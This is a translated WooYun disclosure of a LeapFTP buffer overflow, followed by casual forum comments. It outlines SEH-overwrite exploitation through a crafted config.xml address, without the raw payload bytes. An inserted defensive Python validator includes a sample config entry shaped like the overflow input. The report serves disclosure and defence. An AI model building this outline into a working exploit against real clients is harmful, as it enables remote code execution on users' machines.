
Vulnerability summary

Defect ID: wooyun-2013-021185

Title: LeapFTP buffer overflow code execution vulnerability

Vendor: LeapWare

Author: cssembly

Submitted: 2013-04-03 11:52

Fix time: 2013-07-02 11:53

Disclosed: 2013-07-02 11:53

Vulnerability type: remote code execution

Severity: high

Self-assessed rank: 12

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-04-03: actively contacting the vendor and awaiting vendor acknowledgement; details not disclosed publicly
2013-07-02: the vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

LeapFTP has a design flaw that results in a buffer overflow vulnerability.

Detailed description:

Because the server address is never validated, connecting to a maliciously crafted address link overflows a buffer and leads to code execution.

Proof of concept:

Modify config.xml so that it contains the crafted data (the PoC supplies it as a raw byte dump):
Open the application under a debugger, select the address in the address bar and connect.



When the program faults, the SEH handler can be seen to have been overwritten with a pop pop ret sequence.



Execution then proceeds as intended to the jump instruction placed on the stack.

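As an added defensive example, not part of the original report: a Python check of the kind the report says LeapFTP lacks. It walks the `<recent>`/`<site url="...">` entries that the PoC config.xml uses and rejects any address whose host part is over-long or contains characters outside the hostname alphabet, before the string could reach a fixed-size buffer. The element names come from the PoC; the length limits and the sample config are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Limits a hardened client would enforce before copying an address into a
# fixed-size buffer (assumed values): 253 is the longest legal DNS hostname.
MAX_URL_LEN = 2048
MAX_HOST_LEN = 253
# Letters, digits, '.', '-', plus ':' and brackets for IPv6 literals.
HOST_RE = re.compile(r"^[A-Za-z0-9.:\[\]-]+$")
URL_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*)://([^/]*)(.*)$", re.DOTALL)


def split_host(url):
    """Return (scheme, host) for a URL-like string, or None if it has no scheme."""
    m = URL_RE.match(url)
    if not m:
        return None
    scheme, authority, _path = m.groups()
    host = authority.rsplit("@", 1)[-1]      # drop optional user:pass@
    if host.count(":") == 1:                 # host:port (IPv6 has more colons)
        host = host.split(":", 1)[0]
    return scheme.lower(), host


def check_site_url(url):
    """Return None if url is safe to hand to the connect code, else a reason."""
    if len(url) > MAX_URL_LEN:
        return "url exceeds %d bytes" % MAX_URL_LEN
    parsed = split_host(url)
    if parsed is None:
        return "missing scheme"
    scheme, host = parsed
    if scheme not in ("ftp", "ftps", "sftp"):
        return "unsupported scheme %r" % scheme
    if not host:
        return "empty host"
    if len(host) > MAX_HOST_LEN:
        return "host exceeds %d bytes (%d)" % (MAX_HOST_LEN, len(host))
    if not HOST_RE.match(host):
        return "host contains characters outside the hostname alphabet"
    return None


def audit_config(xml_text):
    """Return [(url, reason)] for every <site> entry whose url fails the check."""
    root = ET.fromstring(xml_text)
    bad = []
    for site in root.iter("site"):
        url = site.get("url", "")
        reason = check_site_url(url)
        if reason:
            bad.append((url, reason))
    return bad


# Constructed sample: one benign entry and one mimicking the PoC shape
# (a backslash followed by a long filler run inside the host part).
SAMPLE_CONFIG = (
    "<config><recent>\n"
    '\t<site url="ftp://ftp.example.com/pub" />\n'
    '\t<site url="ftp://127.0.0.1\\AB' + "A" * 1100 + '" />\n'
    "</recent></config>"
)

if __name__ == "__main__":
    for url, reason in audit_config(SAMPLE_CONFIG):
        print("REJECT %s... : %s" % (url[:40], reason))
```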

Fix recommendation:

Copyright notice: please credit the source when reposting: cssembly@WooYun


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively declined.


Vulnerability rating:

Comments

  1. 2013-04-03 11:56 | xsser Certified white hat ( Regular white hat | Rank:254 Vulns:17 | When I look back on everything, will this world get better?)

    OP, you might want to check out WooYun crowdtesting

  2. 2013-04-03 12:35 | cssembly ( Regular white hat | Rank:202 Vulns:23 | Short on talent, long on diligence!)

    @xsser Sigh... I don't understand website vulnerabilities; working hard to learn from the masters......

  3. 2013-04-03 12:56 | 心伤的瘦子 ( Regular white hat | Rank:147 Vulns:21 | Be serious~ this account is a virtual alt with no real person behind it...)

    @cssembly Some of the tests also involve client-side things :)

  4. 2013-04-03 12:57 | 心伤的瘦子 ( Regular white hat | Rank:147 Vulns:21 | Be serious~ this account is a virtual alt with no real person behind it...)

    I think I have been using this software all along.

  5. 2013-04-03 13:15 | xsser Certified white hat ( Regular white hat | Rank:254 Vulns:17 | When I look back on everything, will this world get better?)

    @cssembly Who says crowdtesting is only about websites? These days a system is one whole

  6. 2013-04-03 15:27 | 梧桐雨 Certified white hat ( Core white hat | Rank:1576 Vulns:184 | Focused on technology and network security)

    @心伤的瘦子 Shouzi has more fans than Erge, godlike

  7. 2013-04-07 09:02 | lmstz ( Passerby | Rank:6 Vulns:2 | SongTianZuo)

    @yy520 Has anyone reproduced it?

  8. 2013-04-07 22:25 | yy520 ( Regular white hat | Rank:139 Vulns:12 )

    @lmstz Goddess, let's exchange ideas

  9. 2013-04-15 18:49 | xsser Certified white hat ( Regular white hat | Rank:254 Vulns:17 | When I look back on everything, will this world get better?)

    @lmstz Is this the goddess?

  10. 2013-04-16 23:23 | 小胖子 Certified white hat ( Core white hat | Rank:1727 Vulns:125 | If the sea could carry away my shortness and ugliness...)

    @lmstz @xsser Brother-in-law, this is Langmei, Song Tianzuo

  11. 2013-07-02 12:24 | xsser Certified white hat ( Regular white hat | Rank:254 Vulns:17 | When I look back on everything, will this world get better?)

    OP, are you there? There is a client-side crowdtest going on lately

  12. 2013-07-02 13:41 | Sunshine ( Intern white hat | Rank:51 Vulns:9 | Nothing.)

    @xsser I suggest giving OP's ignored vulnerabilities some rank?